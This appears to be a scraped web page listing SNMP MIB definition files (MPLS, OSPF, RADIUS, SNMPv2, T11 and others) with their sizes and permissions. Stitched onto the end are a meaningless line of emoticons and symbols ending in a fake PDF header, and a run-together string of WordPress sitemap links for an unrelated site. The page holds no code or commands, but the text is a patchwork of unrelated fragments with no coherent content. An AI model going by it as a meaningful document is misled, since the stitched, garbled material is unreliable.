MPLS-LDP-GENERIC-STD-MIB File 10.32 KB 0644
MPLS-LDP-STD-MIB File 79.77 KB 0644
MPLS-LSR-STD-MIB File 75.17 KB 0644
MPLS-TC-STD-MIB File 23.99 KB 0644
MPLS-TE-STD-MIB File 84.84 KB 0644
MSDP-MIB File 40.23 KB 0644
MTA-MIB File 41.35 KB 0644
Modem-MIB File 43.91 KB 0644
NAT-MIB File 85.24 KB 0644
NETWORK-SERVICES-MIB File 20.51 KB 0644
NHRP-MIB File 89.07 KB 0644
NOTIFICATION-LOG-MIB File 24.15 KB 0644
OPT-IF-MIB File 211.88 KB 0644
OSPF-MIB File 138.26 KB 0644
OSPF-TRAP-MIB File 20.53 KB 0644
P-BRIDGE-MIB File 38.94 KB 0644
PARALLEL-MIB File 7.5 KB 0644
PIM-MIB File 28.73 KB 0644
PIM-STD-MIB File 128.8 KB 0644
PINT-MIB File 17.72 KB 0644
PKTC-IETF-MTA-MIB File 86.53 KB 0644
PKTC-IETF-SIG-MIB File 114.41 KB 0644
POLICY-BASED-MANAGEMENT-MIB File 82.4 KB 0644
POWER-ETHERNET-MIB File 21.17 KB 0644
PPP-BRIDGE-NCP-MIB File 14.59 KB 0644
PPP-IP-NCP-MIB File 6.43 KB 0644
PPP-LCP-MIB File 26.16 KB 0644
PPP-SEC-MIB File 10.39 KB 0644
PTOPO-MIB File 29.76 KB 0644
PerfHist-TC-MIB File 6.48 KB 0644
Printer-MIB File 164.54 KB 0644
Q-BRIDGE-MIB File 82.16 KB 0644
RADIUS-ACC-CLIENT-MIB File 23.74 KB 0644
RADIUS-ACC-SERVER-MIB File 26.28 KB 0644
RADIUS-AUTH-CLIENT-MIB File 26.34 KB 0644
RADIUS-AUTH-SERVER-MIB File 28.43 KB 0644
RADIUS-DYNAUTH-CLIENT-MIB File 31.83 KB 0644
RADIUS-DYNAUTH-SERVER-MIB File 28.6 KB 0644
RAQMON-MIB File 52.05 KB 0644
RDBMS-MIB File 54.06 KB 0644
RFC-1212 File 2.54 KB 0644
RFC-1215 File 831 B 0644
RFC1065-SMI File 3 KB 0644
RFC1155-SMI File 3 KB 0644
RFC1158-MIB File 32.83 KB 0644
RFC1213-MIB File 77.81 KB 0644
RFC1269-MIB File 10.18 KB 0644
RFC1271-MIB File 144.15 KB 0644
RFC1285-MIB File 60.82 KB 0644
RFC1316-MIB File 16.02 KB 0644
RFC1381-MIB File 33.21 KB 0644
RFC1382-MIB File 89.06 KB 0644
RFC1414-MIB File 3.92 KB 0644
RIPv2-MIB File 16.31 KB 0644
RMON-MIB File 144.33 KB 0644
RMON2-MIB File 218.59 KB 0644
ROHC-MIB File 38.95 KB 0644
ROHC-RTP-MIB File 22.04 KB 0644
ROHC-UNCOMPRESSED-MIB File 5.77 KB 0644
RS-232-MIB File 23.42 KB 0644
RSTP-MIB File 10.52 KB 0644
RSVP-MIB File 92.26 KB 0644
RTP-MIB File 35.41 KB 0644
SCSI-MIB File 94.71 KB 0644
SCTP-MIB File 44.55 KB 0644
SFLOW-MIB File 13.93 KB 0644
SIP-COMMON-MIB File 68.92 KB 0644
SIP-MIB File 34.25 KB 0644
SIP-SERVER-MIB File 29.61 KB 0644
SIP-TC-MIB File 6.72 KB 0644
SIP-UA-MIB File 6.25 KB 0644
SLAPM-MIB File 108.31 KB 0644
SMON-MIB File 42.87 KB 0644
SNA-NAU-MIB File 102.87 KB 0644
SNA-SDLC-MIB File 119.03 KB 0644
SNMP-COMMUNITY-MIB File 15.14 KB 0644
SNMP-FRAMEWORK-MIB File 21.86 KB 0644
SNMP-MPD-MIB File 5.38 KB 0644
SNMP-NOTIFICATION-MIB File 19.58 KB 0644
SNMP-PROXY-MIB File 8.9 KB 0644
SNMP-REPEATER-MIB File 119.78 KB 0644
SNMP-TARGET-MIB File 22.27 KB 0644
SNMP-USER-BASED-SM-MIB File 38.33 KB 0644
SNMP-USM-AES-MIB File 2.16 KB 0644
SNMP-USM-DH-OBJECTS-MIB File 20.61 KB 0644
SNMP-VIEW-BASED-ACM-MIB File 33.4 KB 0644
SNMPv2-CONF File 8.07 KB 0644
SNMPv2-MIB File 28.67 KB 0644
SNMPv2-SMI File 8.72 KB 0644
SNMPv2-TC File 37.16 KB 0644
SNMPv2-TM File 5.66 KB 0644
SNMPv2-USEC-MIB File 7.73 KB 0644
SONET-MIB File 73.4 KB 0644
SOURCE-ROUTING-MIB File 14.33 KB 0644
SSPM-MIB File 33.61 KB 0644
SYSAPPL-MIB File 63.05 KB 0644
T11-FC-FABRIC-ADDR-MGR-MIB File 45.88 KB 0644
T11-FC-FABRIC-CONFIG-SERVER-MIB File 62.45 KB 0644
T11-FC-FABRIC-LOCK-MIB File 20.61 KB 0644
T11-FC-FSPF-MIB File 39.98 KB 0644
T11-FC-NAME-SERVER-MIB File 41.27 KB 0644
T11-FC-ROUTE-MIB File 15.91 KB 0644
T11-FC-RSCN-MIB File 27.23 KB 0644
T11-FC-VIRTUAL-FABRIC-MIB File 17.18 KB 0644
T11-FC-ZONE-SERVER-MIB File 96.29 KB 0644
T11-TC-MIB File 2.48 KB 0644
TCP-ESTATS-MIB File 102.9 KB 0644
TCP-MIB File 27.94 KB 0644
TCPIPX-MIB File 10.72 KB 0644
TE-LINK-STD-MIB File 59.46 KB 0644
TE-MIB File 58.79 KB 0644
TIME-AGGREGATE-MIB File 12.95 KB 0644
TN3270E-MIB File 69.46 KB 0644
TN3270E-RT-MIB File 31.65 KB 0644
TOKEN-RING-RMON-MIB File 77.31 KB 0644
TOKENRING-MIB File 27.34 KB 0644
TOKENRING-STATION-SR-MIB File 5.49 KB 0644
TRANSPORT-ADDRESS-MIB File 16.06 KB 0644
TRIP-MIB File 70.05 KB 0644
TRIP-TC-MIB File 4.01 KB 0644
TUNNEL-MIB File 27.21 KB 0644
UDP-MIB File 20.42 KB 0644
UDPLITE-MIB File 20.53 KB 0644
UPS-MIB File 63.46 KB 0644
URI-TC-MIB File 5.76 KB 0644
VDSL-LINE-EXT-MCM-MIB File 24.24 KB 0644
VDSL-LINE-EXT-SCM-MIB File 14.59 KB 0644
VDSL-LINE-MIB File 96.79 KB 0644
VPN-TC-STD-MIB File 2.31 KB 0644
VRRP-MIB File 26.07 KB 0644
WWW-MIB File 40.76 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml